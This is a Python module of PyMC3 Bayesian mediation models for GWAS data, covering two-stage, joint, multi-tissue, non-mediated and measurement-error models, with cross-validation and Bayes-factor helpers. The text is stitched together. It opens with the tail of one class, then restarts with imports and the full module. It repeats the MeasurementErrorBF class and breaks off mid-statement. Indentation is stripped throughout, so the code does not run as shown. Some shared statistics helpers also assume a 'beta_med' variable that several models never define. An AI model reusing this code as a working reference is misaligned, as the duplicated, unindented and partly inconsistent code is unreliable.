phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_mediator, gwas_phen]
return phenotype_model
class MeasurementErrorBF(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self, mediator_mu, mediator_sd, precomp_med=True,
heritability=0.1, p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementErrorBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu, 'mediator_sd': mediator_sd,
'heritability': heritability, 'p_sigma_beta': p_sigma_beta,
'precomp_med': precomp_med}
super(MeasurementErrorBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
mediator = pm.Normal('mediator', mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'], shape=n_samples)
mediator_meas = pm.Normal('mediator_meas', mu=mediator, sd=
gwas_error, shape=n_samples, observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
if self.vars['precomp_med']:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = p_var * h / (1 - h)
md_var = np.square(np.mean(self.vars['mediator_sd']))
md_mean_sq = np.square(np.mean(self.vars['mediator_mu']))
var_alpha = var_explained / (md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
else:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = p_var * h / (1 - h)
md_var = t.var(mediator)
md_mean_sq = t.sqr(t.mean(mediator))
var_alpha = var_explained / (md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
phenotype_mu_null = intercept
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen', lambda value: pm.switch(
mediator_model, pm.Normal.dist(mu=phenotype_mu_mediator, sd
=phenotype_sigma).logp(value), pm.Normal.dist(mu=
phenotype_mu_null, sd=phenotype_sigma).logp(value)),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_mediator, gwas_phen]
return phenotype_model
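# --- Illustrative sketch (added): enabling minibatch ADVI for a large GWAS.
# With variational=True and mb=True, run() zips _mb_generator batches of
# gwas_gen and gwas_phen into pm.variational.advi_minibatch through the
# minibatch_tensors / minibatch_RVs set in create_model.
def _demo_minibatch_advi(gwas_gen, gwas_phen, coef_mean, coef_sd):
    model = TwoStage(coef_mean=coef_mean, coef_sd=coef_sd,
                     variational=True, mb=True, n_chain=50000, n_trace=5000)
    return model.run(gwas_gen=gwas_gen, gwas_phen=gwas_phen)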
# Imports required by the code below. `tinvlogit` (inverse logit on tensors)
# and `calculate_waic` (returns waic, log_py, logp for a trace and model) are
# assumed local helpers not shown in this file.
import numpy as np
import pymc3 as pm
import theano.tensor as t
from scipy import optimize
from scipy.stats import norm
from theano import shared
class BayesianModel(object):
"""
General Bayesian Model Class for quantifying
relationship between gene and phenotype
Adapted from Thomas Wiecki
https://github.com/pymc-devs/pymc3/issues/511#issuecomment-125935523
"""
def __init__(self, variational=True, mb=False, n_chain=50000, n_trace=
5000, logistic=False, steps=None):
"""
Args:
variational (bool, optional): Use Variational Inference
mb (bool, optional): Use minibatches
"""
self.variational = variational
self.cached_model = None
self.mb = mb
self.n_chain = n_chain
self.n_trace = n_trace
self.logistic = logistic
self.steps = steps
def cache_model(self, **inputs):
"""
Create a cached model for the Bayesian model using
shared theano variables for each Bayesian
input parameter.
Args:
**inputs (dict): inputs for Bayesian model
"""
self.shared_vars = self._create_shared_vars(**inputs)
self.cached_model = self.create_model(**self.shared_vars)
def create_model(self, **inputs):
"""
Each subclass of this class needs to define
its PyMC3 model here.
"""
raise NotImplementedError('This method has to be overwritten.')
def _create_shared_vars(self, **inputs):
"""
For each input variable, create theano shared variable
and set their initial values.
Args:
**inputs (dict): inputs for Bayesian model
Returns:
dict: key, value - var_name, theano.shared variable
"""
shared_vars = {}
for name, data in inputs.items():
shared_vars[name] = shared(data, name=name)
return shared_vars
def _clean_inputs(self, inputs):
"""
Clean the inputs, i.e. remove some
genotype columns. Useful for some classes of Bayesian models,
such as Two-Stage, where the first stage involves filtering
on certain SNPs.
Args:
inputs (dict): inputs for Bayesian model
Returns:
dict: cleaned inputs for Bayesian model
"""
return inputs
def run(self, **inputs):
"""
Run cached Bayesian model using the inputs
Args:
**inputs (dict): inputs for Bayesian model
Returns:
trace: Trace of the PyMC3 inference
"""
if self.cached_model is None:
self.cache_model(**inputs)
for name, data in inputs.items():
self.shared_vars[name].set_value(data)
if self.mb and self.variational:
self.minibatches = zip(self._mb_generator(inputs['gwas_gen']),
self._mb_generator(inputs['gwas_phen']))
self.trace = self._inference()
return self.trace
def _inference(self, n_trace=None):
"""
Perform the inference. Uses ADVI if self.variational
is True. Also, uses minibatches if self.mb=True, based
on generators defined in self.run.
Otherwise, uses Metropolis.
Args:
n_trace (int, optional): Number of steps used for trace
Returns:
trace: Trace of the PyMC3 inference
"""
if n_trace is None:
n_trace = self.n_trace
with self.cached_model:
if self.variational:
if self.mb:
v_params = pm.variational.advi_minibatch(n=self.n_chain,
minibatch_tensors=self.minibatch_tensors,
minibatch_RVs=self.minibatch_RVs, minibatches=self.
minibatches)
else:
v_params = pm.variational.advi(n=self.n_chain)
trace = pm.variational.sample_vp(v_params, draws=n_trace)
self.v_params = v_params
else:
if self.steps is None:
self.steps = pm.Metropolis()
start = pm.find_MAP(fmin=optimize.fmin_powell)
trace = pm.sample(self.n_chain, step=self.steps, start=
start, progressbar=True)
trace = trace[-n_trace:]
self.trace = trace
return trace
def cross_validation(self, k_folds, **inputs):
"""
Run cross-validation on the inputs and calculate
statistics for each fold test set.
Args:
k_folds (sklearn.cross_validation): Folds of test and train
samples
**inputs (dict): inputs for Bayesian model
Returns:
dict: statistics for each fold
"""
self.cv_stats, self.cv_traces = [], []
self.k_folds = k_folds
inputs = self._clean_inputs(inputs)
for i, fold in enumerate(k_folds):
train, test = fold
input_train, input_test = {}, {}
for name, data in inputs.items():
if name in self.cv_vars:
input_train[name] = data[train]
input_test[name] = data[test]
else:
input_train[name] = data
input_test[name] = data
trace = self.run(**input_train)
stats = self.calculate_statistics(trace, **input_test)
self.cv_traces.append(trace)
self.cv_stats.append(stats)
return self.cv_traces, self.cv_stats
def calculate_ppc(self, trace):
"""
Calculate several posterior predictive checks
based on the trace.
"""
dic = pm.stats.dic(trace, self.cached_model)
waic, log_py, logp = calculate_waic(trace, self.cached_model)
mu, sd, zscore = self._alpha_stats(trace)
return {'dic': dic, 'waic': waic, 'logp': logp, 'mu': mu, 'sd': sd,
'zscore': zscore}
def calculate_statistics(self, trace, **input_test):
"""
Calculate mse and logp statistics on a test set.
Args:
**input_test (dict): test set of inputs
trace (PyMC3.trace): Trace of the inference chain
Returns:
dict: logp and mse
"""
inputs = self._clean_inputs(input_test)
mc_logp = self._logp(trace, **inputs)
mean_mse = self._mse(trace, **inputs)
mse2 = self._mse2(trace, **inputs)
mu, sd, zscore = self._alpha_stats(trace)
return {'logp': mc_logp, 'mse': mean_mse, 'mse2': mse2, 'mu': mu,
'sd': sd, 'zscore': zscore}
def calculate_bf(self, trace, var_name='mediator_model'):
"""
Calculate Bayes Factor using a Bernoulli variable in the
trace.
"""
p_alt = trace[var_name].mean()
bayes_factor = p_alt / (1 - p_alt)
return bayes_factor
def _logp(self, trace, **inputs):
"""
Calculate log likelihood using Monte Carlo integration.
Args:
**inputs (dict): inputs used in likelihood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Log likelihood as estimated by Monte Carlo integration
"""
def calc_log(step):
exp_pred = np.dot(inputs['gwas_gen'], step['beta_med'].T).ravel()
phen_pred = step['alpha'] * exp_pred
phen_prob = norm.logpdf(x=inputs['gwas_phen'], loc=phen_pred,
scale=step['phenotype_sigma'])
return phen_prob
phen_probs = [calc_log(trace[idx]) for idx in np.random.randint(0,
len(trace), 500)]
phen_probs = np.asmatrix(phen_probs)
mc_logp = phen_probs.sum(axis=1).mean()
return mc_logp
def _mse(self, trace, **inputs):
"""
Calculate mean squared error of the model fit.
Args:
**inputs (dict): inputs used in likelihood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Mean squared error across all samples
"""
phen_mse = []
for idx in np.random.randint(0, len(trace), 500):
step = trace[idx]
exp_pred = np.dot(inputs['gwas_gen'], step['beta_med'].T).ravel()
phen_pred = step['alpha'] * exp_pred
phen_mse.append(np.mean((inputs['gwas_phen'] - phen_pred) ** 2))
mean_mse = np.mean(phen_mse)
return mean_mse
def _mse2(self, trace, **inputs):
"""
Calculate mean squared error of the model fit
using posterior means of beta_med instead of
sampling from it.
Args:
**inputs (dict): inputs used in likelihood calculation
trace (PyMC3.trace): Trace of the inference chain
Returns:
float: Mean squared error across all samples
"""
exp = np.dot(inputs['gwas_gen'], trace['beta_med'].mean(axis=0).T)
phen_pred = exp * trace['alpha'].mean()
mse = np.mean((inputs['gwas_phen'] - phen_pred) ** 2)
return mse
def _alpha_stats(self, trace):
"""
Calculate statistics of the alpha value in
the trace.
"""
mean = np.mean(trace['alpha'])
sd = np.std(trace['alpha'], ddof=1)
zscore = mean / sd
return mean, sd, zscore
def _mb_generator(self, data, size=500):
"""
Generator for minibatches
"""
rng = np.random.RandomState(0)
while True:
ixs = rng.randint(len(data), size=size)
yield data[ixs]
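# --- Illustrative sketch (added): driving cross_validation with the old
# sklearn KFold API (matching the PyMC3-era code above); data are synthetic.
def _demo_cross_validation():
    from sklearn.cross_validation import KFold  # pre-0.18 sklearn, an assumption
    n_ind, n_snps = 200, 10
    gwas_gen = np.random.binomial(2, 0.3, size=(n_ind, n_snps)).astype(float)
    gwas_phen = np.random.normal(size=n_ind)
    model = TwoStage(coef_mean=np.zeros((1, n_snps)),
                     coef_sd=np.ones((1, n_snps)),
                     n_chain=10000, n_trace=1000)
    folds = KFold(n_ind, n_folds=5)
    traces, stats = model.cross_validation(folds,
                                           gwas_gen=gwas_gen,
                                           gwas_phen=gwas_phen)
    return stats  # per-fold logp / mse / alpha summaries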
class TwoStage(BayesianModel):
"""
Two Stage Inference.
First stage: Bootstrapped ElasticNet
Second stage: Use loci that were learned in the first stage
and their mean and std as priors for a simple
Bayesian Linear Regression
Attributes:
"""
def __init__(self, coef_mean, coef_sd, p_sigma_beta=10, *args, **kwargs):
"""
Args:
coef_mean (array): prior means for the SNP effect sizes
coef_sd (array): prior standard deviations for the SNP effect sizes
p_sigma_beta (int): scale of the HalfCauchy prior on the phenotype noise
"""
self.name = 'TwoStage'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd,
'p_sigma_beta': p_sigma_beta}
super(TwoStage, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_mu = intercept + alpha * phenotype_expression_mu
if self.logistic:
p = tinvlogit(phenotype_mu)
phen = pm.Bernoulli('phen', p=p, observed=gwas_phen)
else:
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=
self.vars['p_sigma_beta'])
phen = pm.Normal('phen', mu=phenotype_mu, sd=
phenotype_sigma, observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class TwoStageBF(BayesianModel):
"""
Two Stage Inference.
First stage: Bootstrapped ElasticNet
Second stage: Use loci that were learned in the first stage
and their mean and std as priors for a simple
Bayesian Linear Regression
Attributes:
"""
def __init__(self, coef_mean, coef_sd, p_sigma_beta=10, *args, **kwargs):
"""
Args:
coef_mean (array): prior means for the SNP effect sizes
coef_sd (array): prior standard deviations for the SNP effect sizes
p_sigma_beta (int): scale of the HalfCauchy prior on the phenotype noise
"""
self.name = 'TwoStageBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd,
'p_sigma_beta': p_sigma_beta}
super(TwoStageBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
"""
Simple Bayesian Linear Regression
Args:
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
Returns:
pymc3.Model(): The Bayesian model
"""
n_ind, n_snps = gwas_gen.eval().shape
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
mediator = pm.dot(beta_med, gwas_gen.T)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
phenotype_mu_null = intercept
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen', lambda value: pm.switch(
mediator_model, pm.Normal.dist(mu=phenotype_mu_mediator, sd
=phenotype_sigma).logp(value), pm.Normal.dist(mu=
phenotype_mu_null, sd=phenotype_sigma).logp(value)),
observed=gwas_phen)
self.steps = [pm.BinaryGibbsMetropolis(vars=[mediator_model]),
pm.Metropolis()]
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
class Joint(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype.
"""
def __init__(self, model_type='laplace', coef_sd=None, coef_mean=None,
tau_beta=1, lambda_beta=1, m_sigma_beta=10, p_sigma_beta=10, *args,
**kwargs):
"""
Expression ~ N(X\\beta, \\sigma_exp)
P(\\beta) ~ Horseshoe(tau_beta, lambda_beta)
P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(X\\beta\\alpha, \\sigma_phen)
P(\\alpha) ~ N(0, 1)
P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
tau_beta (int): P(\\beta) ~ Horseshoe(tau_beta, lambda_beta)
lambda_beta (int): P(\\beta) ~ Horseshoe(tau_beta, lambda_beta)
m_sigma_beta (int): P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'Joint'
self.model_type = model_type
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'coef_mean': coef_mean, 'coef_sd': coef_sd, 'tau_beta':
tau_beta, 'lambda_beta': lambda_beta, 'm_sigma_beta':
m_sigma_beta, 'p_sigma_beta': p_sigma_beta}
if model_type == 'laplace':
self.create_model = self._create_model_laplace
elif model_type == 'horseshoe':
self.create_model = self._create_model_horseshoe
elif model_type == 'prior':
self.create_model = self._create_model_prior
else:
raise NotImplementedError('Unsupported model type')
super(Joint, self).__init__(*args, **kwargs)
def _create_model_prior(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta_med = pm.Normal('beta_med', mu=self.vars['coef_mean'], sd=
self.vars['coef_sd'], shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_horseshoe(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
tau_beta = pm.HalfCauchy('tau_beta', beta=self.vars['tau_beta'])
lambda_beta = pm.HalfCauchy('lambda_beta', beta=self.vars[
'lambda_beta'], shape=(1, n_snps))
total_variance = pm.dot(lambda_beta * lambda_beta, tau_beta *
tau_beta)
beta_med = pm.Normal('beta_med', mu=0, tau=1 / total_variance,
shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
alpha = pm.Normal('alpha', 0, 1)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
def _create_model_laplace(self, med_gen, med_phen, gwas_gen, gwas_phen):
"""
Args:
med_gen (pandas.DataFrame): Mediator genotypes
med_phen (pandas.DataFrame): Mediator phenotypes
gwas_gen (pandas.DataFrame): GWAS genotypes
gwas_phen (pandas.DataFrame): GWAS phenotypes
"""
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta_med = pm.Laplace('beta_med', mu=0, b=1, shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1)
mediator_mu = mediator_intercept + pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'])
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma, observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Normal('alpha', 0, 1)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * phenotype_expression_mu
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
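# --- Illustrative sketch (added): fitting Joint, which shares beta_med
# between the mediator regression and the GWAS regression; data are synthetic.
def _demo_joint():
    n_med, n_gwas, n_snps = 150, 400, 8
    med_gen = np.random.binomial(2, 0.3, size=(n_med, n_snps)).astype(float)
    med_phen = np.random.normal(size=n_med)
    gwas_gen = np.random.binomial(2, 0.3, size=(n_gwas, n_snps)).astype(float)
    gwas_phen = np.random.normal(size=n_gwas)
    model = Joint(model_type='laplace', n_chain=10000, n_trace=2000)
    trace = model.run(med_gen=med_gen, med_phen=med_phen,
                      gwas_gen=gwas_gen, gwas_phen=gwas_phen)
    return model.calculate_ppc(trace)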
class MultiStudyMultiTissue(BayesianModel):
"""
Jointly model the transcriptional regulation and
its effect on the phenotype in multiple studies
and multiple tissues. Assume that tissues from the same
individual are independent given the genotypes i.e.
P(TisA, TisB | G) = P(TisA | G) P(TisB | G)
"""
def __init__(self, m_laplace_beta=1, m_sigma_beta=10, p_sigma_beta=10,
*args, **kwargs):
"""
Expression ~ N(X\\beta, \\sigma_exp)
P(\\beta) ~ Laplace(0, m_laplace_beta)
P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
Phenotype ~ N(X\\beta\\alpha, \\sigma_phen)
P(\\alpha) ~ N(alpha_mu, alpha_sd), one alpha per study
P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
Args:
m_laplace_beta (int): P(\\beta) ~ Laplace(0, m_laplace_beta)
m_sigma_beta (int): P(\\sigma_exp) ~ HalfCauchy(m_sigma_beta)
p_sigma_beta (int): P(\\sigma_phen) ~ HalfCauchy(p_sigma_beta)
"""
self.name = 'MultiStudyMultiTissue'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'m_laplace_beta': m_laplace_beta, 'm_sigma_beta':
m_sigma_beta, 'p_sigma_beta': p_sigma_beta}
super(MultiStudyMultiTissue, self).__init__(*args, **kwargs)
def set_idx(self, med_idx, gwas_idx):
self.med_idx = med_idx
self.gwas_idx = gwas_idx
return
def create_model(self, med_gen, med_phen, gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
n_tissues = len(np.unique(self.med_idx))
n_studies = len(np.unique(self.gwas_idx))
with pm.Model() as phenotype_model:
beta_med = pm.Laplace('beta_med', mu=0, b=self.vars[
'm_laplace_beta'], shape=(1, n_snps))
mediator_intercept = pm.Normal('mediator_intercept', mu=0, sd=1,
shape=n_tissues)
mediator_gamma = pm.Uniform('mediator_gamma', lower=0, upper=1,
shape=n_tissues)
mediator_mu = mediator_intercept[self.med_idx] + mediator_gamma[
self.med_idx] * pm.dot(beta_med, med_gen.T)
mediator_sigma = pm.HalfCauchy('mediator_sigma', beta=self.vars
['m_sigma_beta'], shape=n_tissues)
mediator = pm.Normal('mediator', mu=mediator_mu, sd=
mediator_sigma[self.med_idx], observed=med_phen)
intercept = pm.Normal('intercept', mu=0, sd=1, shape=n_studies)
alpha_mu = pm.Normal('alpha_mu', mu=0, sd=1)
alpha_sd = pm.HalfCauchy('alpha_sd', beta=1)
alpha = pm.Normal('alpha', mu=alpha_mu, sd=alpha_sd, shape=
n_studies)
phenotype_expression_mu = pm.dot(beta_med, gwas_gen.T)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=1,
shape=n_studies)
phen_mu = intercept[self.gwas_idx] + alpha[self.gwas_idx
] * phenotype_expression_mu
phen_sigma = phenotype_sigma[self.gwas_idx]
phen = pm.Normal('phen', mu=phen_mu, sd=phen_sigma, observed=
gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
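# --- Illustrative sketch (added): the index arrays for set_idx map each
# mediator row to a tissue and each GWAS row to a study; data are synthetic.
def _demo_multi_study_multi_tissue():
    n_med, n_gwas, n_snps = 120, 300, 6
    med_gen = np.random.binomial(2, 0.3, size=(n_med, n_snps)).astype(float)
    med_phen = np.random.normal(size=n_med)
    gwas_gen = np.random.binomial(2, 0.3, size=(n_gwas, n_snps)).astype(float)
    gwas_phen = np.random.normal(size=n_gwas)
    model = MultiStudyMultiTissue()
    model.set_idx(med_idx=np.repeat([0, 1, 2], n_med // 3),   # three tissues
                  gwas_idx=np.repeat([0, 1], n_gwas // 2))    # two studies
    trace = model.run(med_gen=med_gen, med_phen=med_phen,
                      gwas_gen=gwas_gen, gwas_phen=gwas_phen)
    return trace['alpha'].mean(axis=0)  # one posterior mean alpha per study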
class NonMediated(BayesianModel):
"""
Model the relationship between the genotype and
phenotype without any added information about the
mediator. Use it as a basis for getting
the null distribution under a mediation analysis.
"""
def __init__(self, g_laplace_beta=1, p_sigma_beta=10, *args, **kwargs):
self.name = 'NonMediated'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'g_laplace_beta': g_laplace_beta, 'p_sigma_beta':
p_sigma_beta}
super(NonMediated, self).__init__(*args, **kwargs)
def create_model(self, gwas_gen, gwas_phen):
n_snps = gwas_gen.eval().shape[1]
with pm.Model() as phenotype_model:
beta = pm.Laplace('beta', mu=0, b=self.vars['g_laplace_beta'],
shape=(1, n_snps))
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + pm.dot(beta, gwas_gen.T)
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_gen, gwas_phen]
return phenotype_model
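# --- Illustrative sketch (added): fitting the genotype-only null model and
# inspecting the posterior SNP effects.
def _demo_non_mediated(gwas_gen, gwas_phen):
    model = NonMediated(g_laplace_beta=1, p_sigma_beta=10)
    trace = model.run(gwas_gen=gwas_gen, gwas_phen=gwas_phen)
    return trace['beta'].mean(axis=0)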
class MeasurementError(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self, mediator_mu, mediator_sd, m_laplace_beta=1,
p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementError'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu, 'mediator_sd': mediator_sd,
'p_sigma_beta': p_sigma_beta}
super(MeasurementError, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
mediator = pm.Normal('mediator', mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'], shape=n_samples)
mediator_meas = pm.Normal('mediator_meas', mu=mediator, sd=
gwas_error, shape=n_samples, observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
alpha = pm.Uniform('alpha', lower=-10, upper=10)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
phenotype_mu = intercept + alpha * mediator
phen = pm.Normal('phen', mu=phenotype_mu, sd=phenotype_sigma,
observed=gwas_phen)
if self.variational and self.mb:
self.minibatch_RVs = [phen]
self.minibatch_tensors = [gwas_mediator, gwas_phen]
return phenotype_model
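# --- Illustrative sketch (added): one way to build the MeasurementError
# inputs. Assumes `boot_predictions` holds bootstrapped first-stage expression
# imputations of shape (n_bootstraps, n_samples).
def _demo_measurement_error(boot_predictions, gwas_phen):
    med_mu = boot_predictions.mean(axis=0)
    med_sd = boot_predictions.std(axis=0, ddof=1)
    model = MeasurementError(mediator_mu=med_mu, mediator_sd=med_sd)
    trace = model.run(gwas_mediator=med_mu, gwas_phen=gwas_phen,
                      gwas_error=med_sd)
    return model.calculate_ppc(trace)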
class MeasurementErrorBF(BayesianModel):
"""
Use the canonical definition of measurement error as described
in http://andrewgelman.com/2016/09/04/29847/
"""
def __init__(self, mediator_mu, mediator_sd, precomp_med=True,
heritability=0.1, p_sigma_beta=10, *args, **kwargs):
self.name = 'MeasurementErrorBF'
self.cv_vars = ['gwas_phen', 'gwas_gen']
self.vars = {'mediator_mu': mediator_mu, 'mediator_sd': mediator_sd,
'heritability': heritability, 'p_sigma_beta': p_sigma_beta,
'precomp_med': precomp_med}
super(MeasurementErrorBF, self).__init__(*args, **kwargs)
def create_model(self, gwas_mediator, gwas_phen, gwas_error):
n_samples = gwas_mediator.eval().shape[0]
with pm.Model() as phenotype_model:
mediator = pm.Normal('mediator', mu=self.vars['mediator_mu'],
sd=self.vars['mediator_sd'], shape=n_samples)
mediator_meas = pm.Normal('mediator_meas', mu=mediator, sd=
gwas_error, shape=n_samples, observed=gwas_mediator)
intercept = pm.Normal('intercept', mu=0, sd=1)
phenotype_sigma = pm.HalfCauchy('phenotype_sigma', beta=self.
vars['p_sigma_beta'])
if self.vars['precomp_med']:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = p_var * h / (1 - h)
md_var = np.square(np.mean(self.vars['mediator_sd']))
md_mean_sq = np.square(np.mean(self.vars['mediator_mu']))
var_alpha = var_explained / (md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
else:
p_var = t.sqr(phenotype_sigma)
h = self.vars['heritability']
var_explained = p_var * h / (1 - h)
md_var = t.var(mediator)
md_mean_sq = t.sqr(t.mean(mediator))
var_alpha = var_explained / (md_var + md_mean_sq)
alpha = pm.Normal('alpha', mu=0, sd=t.sqrt(var_alpha))
p = np.array([0.5, 0.5])
mediator_model = pm.Bernoulli('mediator_model', p[1])
phenotype_mu_null = intercept
phenotype_mu_mediator = intercept + alpha * mediator
phen = pm.DensityDist('phen', lambda value: pm.switch(
mediator_model, pm.Normal.dist(mu=phenotype_mu_mediator, sd
